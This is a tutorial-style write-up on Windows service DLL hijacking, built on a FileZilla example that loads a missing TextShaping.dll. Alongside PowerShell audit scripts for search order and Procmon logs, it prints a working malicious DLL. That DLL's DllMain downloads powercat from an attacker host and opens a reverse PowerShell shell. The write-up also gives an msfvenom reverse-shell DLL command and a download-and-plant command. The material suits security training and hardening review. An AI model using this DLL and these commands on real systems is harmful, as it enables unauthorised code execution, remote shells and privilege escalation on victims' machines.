Service DLL Hijacking

This attack is similar to "Service Binary Hijacking" but instead of replacing the executable, it targets a DLL the application relies on.

Another approach is to abuse the DLL search order: when an application loads a DLL without giving an absolute path, Windows looks for it in this sequence:

1. The directory from which the application loaded.
2. The system directory.
3. The 16-bit system directory.
4. The Windows directory.
5. The current directory.
6. Directories in the PATH environment variable.
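The resolver below is an added example (not code from the original page) that walks the six locations listed above for a given executable and DLL name and reports where the DLL would actually be resolved from, plus every earlier directory that is currently empty and would therefore shadow it. The function name, parameter names and the sample paths are assumptions; the system directory is taken as System32, which is right for a 64-bit process (a 32-bit process is redirected to SysWOW64).

```powershell
# Added example: audit where a DLL name resolves to for a given executable,
# following the search order listed above. Function and parameter names are
# assumptions, not part of the original page.
function Resolve-DllSearchOrder {
    [CmdletBinding()]
    param(
        [Parameter(Mandatory)] [string] $ExePath,   # e.g. 'C:\FileZilla\FileZilla FTP Client\filezilla.exe'
        [Parameter(Mandatory)] [string] $DllName    # e.g. 'TextShaping.dll'
    )

    $windir = $env:SystemRoot
    # Positions 1-5 mirror the list above; PATH entries follow as 6, 7, ...
    # System32 assumes a 64-bit process (32-bit processes see SysWOW64).
    $candidates = [ordered]@{
        '1 Application directory' = (Get-Item -LiteralPath $ExePath).DirectoryName
        '2 System directory'      = Join-Path $windir 'System32'
        '3 16-bit system dir'     = Join-Path $windir 'System'
        '4 Windows directory'     = $windir
        '5 Current directory'     = (Get-Location).Path
    }
    $i = 6
    foreach ($p in ($env:Path -split ';' | Where-Object { $_ })) {
        $candidates["$i PATH: $p"] = $p
        $i++
    }

    $found = $false
    foreach ($entry in $candidates.GetEnumerator()) {
        $full   = Join-Path $entry.Value $DllName
        $exists = Test-Path -LiteralPath $full -PathType Leaf
        [pscustomobject]@{
            Order     = $entry.Key
            Directory = $entry.Value
            Present   = $exists
            # The first hit is what the loader maps; any earlier directory
            # with Present = $false is a location that would shadow it.
            WouldLoad = (-not $found) -and $exists
            Shadows   = (-not $found) -and (-not $exists)
        }
        if ($exists) { $found = $true }
    }
}

# Usage (paths are placeholders from the FileZilla example on this page):
Resolve-DllSearchOrder -ExePath 'C:\FileZilla\FileZilla FTP Client\filezilla.exe' -DllName 'TextShaping.dll' |
    Format-Table Order, Present, WouldLoad, Shadows, Directory -AutoSize
```

Rows with Shadows = True are the directories a hardening review should care about: if any of them is writable by non-administrators, the legitimate DLL further down the order is never reached.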

Exploiting a Missing DLL

List installed applications (this key covers 32-bit applications on 64-bit Windows; 64-bit entries are under HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall):

Get-ItemProperty "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname

Research which of the installed applications are known to be vulnerable to DLL hijacking.

The following example shows a service vulnerable to this kind of attack.

FileZilla DLL Hijacking Exploit

In the example above, the application attempts to load a DLL but fails to find it in its own directory. Instead, TextShaping.dll loads from the System directory (2nd in the search order).

The following screenshot is from Procmon, showing the application's attempt to load TextShaping.dll from the directory from which the application loaded.

Procmon DLL attach failed
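Reading failed loads off a Procmon screenshot does not scale, so the following added example (not from the original page) triages a Procmon CSV export for the same pattern: CreateFile operations on a .dll path that returned NAME NOT FOUND. The CSV rows are constructed sample data in Procmon's default export column layout; the function name and parameter names are assumptions.

```powershell
# Added example: find DLL load attempts that failed, as seen in the Procmon
# screenshot above. The rows below are constructed sample data, not a real
# capture; on a real export use Import-Csv .\Logfile.CSV instead.
$sampleCsv = @'
"Time of Day","Process Name","PID","Operation","Path","Result","Detail"
"10:01:02.0000001 AM","filezilla.exe","4242","CreateFile","C:\FileZilla\FileZilla FTP Client\TextShaping.dll","NAME NOT FOUND","Desired Access: Read Attributes, Disposition: Open"
"10:01:02.0000002 AM","filezilla.exe","4242","CreateFile","C:\Windows\System32\TextShaping.dll","SUCCESS","Desired Access: Read Attributes, Disposition: Open"
"10:01:02.0000003 AM","filezilla.exe","4242","CreateFile","C:\FileZilla\FileZilla FTP Client\settings.xml","NAME NOT FOUND","Desired Access: Generic Read"
"10:01:02.0000004 AM","svchost.exe","900","RegQueryValue","HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_DLLs","SUCCESS","Type: REG_SZ, Length: 2"
'@

function Find-MissingDllLoads {
    param(
        [Parameter(Mandatory)] [object[]] $Events,   # rows from Import-Csv / ConvertFrom-Csv
        [string] $ProcessName                        # optional filter, e.g. 'filezilla.exe'
    )
    $Events |
        Where-Object {
            # A missing DLL shows up as a CreateFile probe that returns NAME NOT FOUND;
            # successful loads appear later as SUCCESS (and as Load Image events).
            $_.Operation -eq 'CreateFile' -and
            $_.Result    -eq 'NAME NOT FOUND' -and
            $_.Path      -like '*.dll' -and
            (-not $ProcessName -or $_.'Process Name' -eq $ProcessName)
        } |
        Group-Object -Property Path |
        ForEach-Object {
            [pscustomobject]@{
                Process   = $_.Group[0].'Process Name'
                Directory = Split-Path -Parent $_.Name
                DllName   = Split-Path -Leaf $_.Name
                Attempts  = $_.Count
            }
        }
}

$events = $sampleCsv | ConvertFrom-Csv
Find-MissingDllLoads -Events $events -ProcessName 'filezilla.exe' | Format-Table -AutoSize
```

On the sample data this returns a single row for TextShaping.dll in the FileZilla directory; the settings.xml miss and the svchost.exe registry read are filtered out. Each reported Directory is a candidate for the permission review described in the next section.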

Attack Path

To exploit this, place a DLL with the expected name in the FileZilla directory. Because that directory is searched first, the application loads the attacker's version instead of the legitimate one and executes its code.

Creating The DLL

In C/C++, the DllMain entry point is called by the loader at each stage of the DLL's life cycle (process attach/detach, thread attach/detach), which is where the code is executed:

TextShaping.cpp (compiled to TextShaping.dll)
#include <windows.h>
#include <stdlib.h>   // system()

// The loader calls DllMain when the DLL is mapped into the process
// (DLL_PROCESS_ATTACH), on thread creation/exit, and on unload.
// The command runs once, at process attach.
BOOL APIENTRY DllMain(HMODULE hModule,
	DWORD  ul_reason_for_call,
	LPVOID lpReserved
)
{
	switch (ul_reason_for_call)
	{
	case DLL_PROCESS_ATTACH:
		system("powershell -c \"IEX (New-Object System.Net.Webclient).DownloadString('http://<attacker_ip>/powercat.ps1'); powercat -c <attacker_ip> -p <attacker_port> -e powershell\"");
		break;
	case DLL_THREAD_ATTACH:
	case DLL_THREAD_DETACH:
	case DLL_PROCESS_DETACH:
		break;
	}
	return TRUE;   // FALSE would make the load fail and unload the DLL
}

Compile it:

x86_64-w64-mingw32-gcc TextShaping.cpp --shared -o TextShaping.dll

Alternatively, use msfvenom to generate the DLL:

msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f dll -o TextShaping.dll

Exploiting

Move the DLL into the application's directory (here by downloading it from the attacker's host):

iwr -uri http://<attacker_ip>/TextShaping.dll -OutFile 'C:\FileZilla\FileZilla FTP Client\TextShaping.dll'

As soon as the DLL is loaded (DLL_PROCESS_ATTACH), DllMain executes.

References

Dynamic-link library search order
Process Monitor
